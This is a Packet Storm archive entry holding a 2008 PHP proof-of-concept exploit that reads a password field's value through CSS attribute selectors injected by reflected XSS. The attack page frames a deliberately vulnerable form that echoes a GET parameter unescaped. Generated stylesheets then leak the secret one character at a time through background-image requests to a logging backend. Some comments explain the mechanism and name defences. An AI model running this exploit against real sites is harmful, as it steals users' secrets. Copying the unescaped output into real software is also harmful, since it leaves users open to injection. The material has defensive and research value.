css-read.txt

2008-10-23T00:00:00
ID PACKETSTORM:71168
Type packetstorm
Reporter Sirdarckcat
Modified 2008-10-23T00:00:00

Description

                                        
                                            `<?php  
/***** BEGIN LICENSE BLOCK *****  
  
CSSH - a proof of concept CSS based history crawler  
  
Copyright (C) 2008 Sirdarckcat  
  
This program is free software; you can redistribute it and/or modify  
it under the terms of the GNU General Public License as published by  
the Free Software Foundation; either version 2 of the License, or  
(at your option) any later version.  
  
This program is distributed in the hope that it will be useful,  
but WITHOUT ANY WARRANTY; without even the implied warranty of  
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  
GNU General Public License for more details.  
  
You should have received a copy of the GNU General Public License  
along with this program; if not, write to the Free Software  
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA  
  
***** END LICENSE BLOCK *****/  
  
// Self-disclosure switch: ?source prints this file syntax-highlighted and ends the
// request before any session or routing logic below is reached.
if (isset($_GET['source'])) {
    highlight_file(__FILE__);
    exit;
}
  
// Shared setup for every request: open the session and read the routing parameters.
session_start();
$file = basename(__FILE__); // this script's own file name, used to build self-referencing URLs
$d = $_GET['d'];            // phase selector consumed by the css/backend branches
$i = $_GET['i'];            // value carried by a stylesheet-triggered callback request

// ?logout discards the stored session data.
if (isset($_GET['logout'])) {
    session_destroy();
}

// ?debug dumps the request parameters merged with the session contents
// (array union: a GET key wins over a session key of the same name).
if (isset($_GET['debug'])) {
    print_r($_GET + $_SESSION);
}
// Request router. Four branches: ?css serves a generated stylesheet, ?backend records
// callbacks, ?attack prints the demo driver page, anything else prints the target form.
if(isset($_GET['css'])){  
// Stylesheet endpoint: the CSS that is emitted depends on the phase in $d and on session state.
switch($d){  
case 'range':  
// Reset phase: clear earlier results and rebuild the candidate character list.
ob_start("ob_gzhandler");  
$_SESSION['range']=Array();  
$_SESSION['value_']="";  
$_SESSION['_value']="";  
// Candidates are the bytes 16..127. The loop reuses $i, overwriting the request's `i` value.
for($i=16;$i<=127;$i++){  
// Disabled variant: one `value*=` rule per character, each calling the backend 'range' case.
//echo 'input[value*="\\'.dechex($i).'"]{background:url("'.$file.'?backend&d=range&i=%'.dechex($i).'");}';  
$_SESSION['range'][]=chr($i);  
}  
echo "body{background:url('$file?finished');}";  
break;  
case 'reading':  
// Waits while the session's candidate list is empty.
while(empty($_SESSION['range']))sleep(1);  
sleep(5);//session_start() locks the file loading, and we wait 5 seconds for reading next char  
ob_start("ob_gzhandler");  
$range=$_SESSION['range'];  
// Prefix and suffix recorded so far, URL-encoded with '%' swapped for '\' so that
// encoded bytes are written as backslash escapes inside the selector strings.
$value_=strtr(urlencode($_SESSION['value_']),"%","\\");  
$_value=strtr(urlencode($_SESSION['_value']),"%","\\");  
// Three rules per candidate character:
//   `^=` matches when the field starts with prefix+candidate (styles the input itself),
//   `$=` matches when it ends with candidate+suffix (styles the next sibling),
//   `=`  matches the complete value (styles the sibling after that).
// A matching rule makes the browser request the background URL; that request is the
// only channel by which the match reaches the ?backend branch.
foreach($range as $char){  
$i=ord($char);  
echo 'input[value^="'.$value_.'\\'.dechex($i).'"]{background:url("'.$file.'?backend&d=beg&i=%'.dechex($i).'");}';  
echo 'input[value$="\\'.dechex($i).$_value.'"] + *{background:url("'.$file.'?backend&d=end&i=%'.dechex($i).'");}';  
echo 'input[value="'.$value_."\\".dechex($i).$_value.'"]+*+*{background:url("'.$file.'?backend&d=fin&i='.$value_.$_value.'");}';  
echo "\n";  
}  
break;  
}  
}else if(isset($_GET['backend'])){  
// Callback endpoint: stores what the stylesheet-triggered requests report in the session.
switch($d){  
case 'range':  
// Adds the reported value to the candidate list, then redirects to an external image.
$_SESSION['range'][]=$i;  
header('Location: http://p42.us/x.png');  
break;  
case 'beg':  
// Appends the reported character to the recorded prefix.
// As written there is no `break`, so control continues into 'end' and 'fin'.
$_SESSION['value_'].=$i;  
case 'end':  
// Prepends the reported character to the recorded suffix; again no `break` before 'fin'.
$_SESSION['_value']=$i.$_SESSION['_value'];  
case 'fin':  
// Stores $i under the 'value' session key.
$_SESSION['value']=$i;  
break;  
}  
}else if(isset($_GET['attack'])){  
// Demo driver: frames this same script seven times, each time passing a
// <style>@import ...</style> value in the `xss` parameter so that the default page
// below loads a generated stylesheet. The first frame asks for d=range, the other six
// for d=reading. The growing `/_` path suffix presumably only makes each stylesheet
// URL distinct; TODO confirm.
?>  
<iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_?css%26d=range%22%3B</style>"></iframe>  
<iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_/_?css%26d=reading%22%3B</style>"/></iframe>  
<iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_/_/_?css%26d=reading%22%3B</style>"/></iframe>  
<iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_/_/_/_?css%26d=reading%22%3B</style>"/></iframe>  
<iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_/_/_/_/_?css%26d=reading%22%3B</style>"/></iframe>  
<iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_/_/_/_/_/_?css%26d=reading%22%3B</style>"/></iframe>  
<iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_/_/_/_/_/_/_?css%26d=reading%22%3B</style>"/></iframe>  
<?php  
}else{  
// Default page: the form that acts as the demo's target. A POSTed `pass` is kept in the session.
if(isset($_POST['pass'])){  
$_SESSION['knownvalue']=$_POST['pass'];  
}  
// The markup below has the two properties the demo relies on:
//  - $_GET['xss'] is echoed into <head> with no escaping, so the request decides which
//    markup and stylesheets the page loads;
//  - the stored secret is written back (also unescaped) into the password field's `value`
//    attribute, where attribute selectors of any stylesheet on the page can test it.
// What a defender takes from this: encode reflected input for its output context
// (e.g. htmlspecialchars() with ENT_QUOTES), never pre-fill a secret into `value`, and
// limit stylesheet sources with a Content-Security-Policy `style-src` directive. Script
// filtering alone does not help, because no script runs at any point.
?>  
<html>  
<head>  
<title>Start</title>  
<?php echo $_GET['xss'];?>  
</head>  
<body>  
<form method=POST>  
Enter something here and press enter <input name="pass" type="password" value="<?php echo $_SESSION['knownvalue']; ?>"/>  
</form>  
</body>  
</html>  
<?php  
}  
?>   
`